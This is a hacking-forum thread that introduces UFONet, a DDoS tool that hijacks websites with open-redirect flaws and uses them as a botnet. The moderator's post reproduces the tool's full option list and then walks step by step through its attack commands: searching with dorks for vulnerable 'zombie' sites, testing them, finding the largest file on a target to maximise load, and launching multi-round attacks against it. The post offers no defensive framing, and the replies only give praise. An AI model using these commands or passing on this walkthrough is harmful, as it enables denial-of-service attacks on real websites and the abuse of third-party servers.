send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

UFONet - DDoS Botnet via Web Abuse.

  • 2 Respuestas
  • 9273 Vistas

0 Usuarios y 3 Visitantes están viendo este tema.

Desconectado HATI

  • *
  • Moderador
  • Mensajes: 419
  • Actividad:
    6.67%
  • Reputación 11
    • Ver Perfil
« en: Abril 14, 2016, 08:34:40 pm »
UFONet


You can read this post on spanish language:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Maybe a lot of people know about this tool, but i don´t found nothing about it on the forum, and it is the reason of this post.

Briefly, UFONet is a DDoS tool, that exploit the Open Redirect vulnerability on third party web applications like botnet.
The Open Redirect vulnerability allows the attacker to perform redirection to the target that he choose, because that redirection is on a variable that the user can control.

I think that this tool is curious and easy to use, it found a useful  and creative way to exploit Open Redirect vulnerability.


--Help:

Options:
  --version                                               show program's version number and exit
  -h, --help                                              show this help message and exit
  -v, --verbose                                         active verbose on requests
  --update                                               check for latest stable version
  --check-tor                                           check to see if Tor is used properly
  --force-yes                                           set 'YES' to all questions
  --disableisup                                          disable external check of target's status
  --gui                                                    run GUI (UFONet Web Interface)

  *Configure Request(s)*:
    --proxy=PROXY                                    Use proxy server (tor: 'You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login')
    --user-agent=AGENT                             Use another HTTP User-Agent header (default SPOOFED)
    --referer=REFERER                                Use another HTTP Referer header (default SPOOFED)
    --host=HOST                                       Use another HTTP Host header (default NONE)
    --xforw                                               Set your HTTP X-Forwarded-For with random IP values
    --xclient                                             Set your HTTP X-Client-IP with random IP values
    --timeout=TIMEOUT                              Select your timeout (default 10)
    --retries=RETRIES                                 Retries when the connection timeouts (default 1)
    --threads=THREADS                              Maximum number of concurrent HTTP requests (default 5)
    --delay=DELAY                                     Delay in seconds between each HTTP request (default 0)

  *Search for 'Zombies'*:
    -s SEARCH                                           Search from a 'dork' (ex: -s 'proxy.php?url=')
    --sd=DORKS                                         Search from a list of 'dorks' (ex: --sd 'dorks.txt')
    --sn=NUM_RESULTS                              Set max number of results for engine (default 10)
    --se=ENGINE                                        Search engine to use for 'dorking' (default: duck)
    --sa                                                   Search massively using all search engines

  *Test Botnet*:

    -t TEST                                              Update 'zombies' status (ex: -t 'zombies.txt')
    --attack-me                                        Order 'zombies' to attack you (NAT required!)

  *Community*:
    --download-zombies                              Download 'zombies' from Community server: Turina
    --upload-zombies                                  Upload your 'zombies' to Community server: Turina
    --blackhole                                          Create a 'blackhole' to share your 'zombies'
    --up-to=UPIP                                       Upload your 'zombies' to a 'blackhole'
    --down-from=DIP                                  Download your 'zombies' from a 'blackhole'

  *Research Target*:

    -i INSPECT                                           Search for biggest file (ex: -i 'You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login')

  *Configure Attack(s)*:
    --disable-aliens                                     Disable 'aliens' web abuse of test services
    --disable-isup                                       Disable check status 'is target up?'
    -r ROUNDS                                           Set number of rounds (default: 1)
    -b PLACE                                             Set place to attack (ex: -b '/path/big.jpg')
    -a TARGET                                           Start Web DDoS attack (ex: -a 'http(s)://target.com')


Attack method:

#Searching for 'zombies':

For perform DDoS attack using UFONet, first of all we must collect websites that are vulnerable to Open Redirect (zombies). For it, we must use specific Dorks. The tool include a wordlist called dorks.txt where we can find some useful parameters such as "proxy.php? Url =" or "validator? Uri =".

-Search by parameter:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
./ufonet -s 'proxy.php?url='
-Search by dorks list:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
./ufonet -s 'proxy.php?url='
-Select search engine between google, duck, yahoo, yandex y bing:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
./ufonet -s 'proxy.php?url=' --se 'bing'
-Select all search engine:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
./ufonet -s 'proxy.php?url=' --sa
-Control how many 'zombies' recieve from search engines you can use:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  ./ufonet --sd 'dorks.txt' --sa --sn 20
-At the end of the process, you will be asked if you want to check the list retrieved to see
  if the urls are vulnerable:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Wanna check if they are valid zombies? (Y/n)
- Also, you will be asked to update the list adding automatically only 'vulnerable' web apps:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Wanna update your list (Y/n)

#Testing botnet:

-Launch test:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
./ufonet -t zombies.txt
-Order to 'zombies' to attack you:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
./ufonet --attack-me

#Inspecting a target:

-This feature will provides you the biggest file on target:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
./ufonet -i http://target.com
- You can use this when attacking to be more effective:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"

#Attacking a target:

-Enter a target to attack with a number of rounds (1 round by default):
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
./ufonet -a http://target.com -r 10


These are the basic options of UFONet, it have more advanced functions like use proxy. Is possible to use the tool with a GUI wiht the command:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
./ufonet --gui

Spanish post: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Official site: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Regards, hati  ;D
« Última modificación: Mayo 11, 2016, 04:11:19 pm por hati »


Jugar o perder

Desconectado unkdown

  • *
  • Underc0der
  • Mensajes: 48
  • Actividad:
    0%
  • Reputación 0
  • Knowledge is free.
    • Ver Perfil
  • Twitter: zanutsec
« Respuesta #1 en: Mayo 03, 2016, 11:38:17 am »
Good job homie! :D
if someone dont understand that, i can leave a video here.




« Última modificación: Diciembre 10, 2016, 02:13:04 pm por blackdrake »

Desconectado AncientOne

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Febrero 21, 2017, 10:24:59 pm »
It seems really interesting body.  ;)
Push yourself as far as you can and when you can't keep going until the end...

 

¿Te gustó el post? COMPARTILO!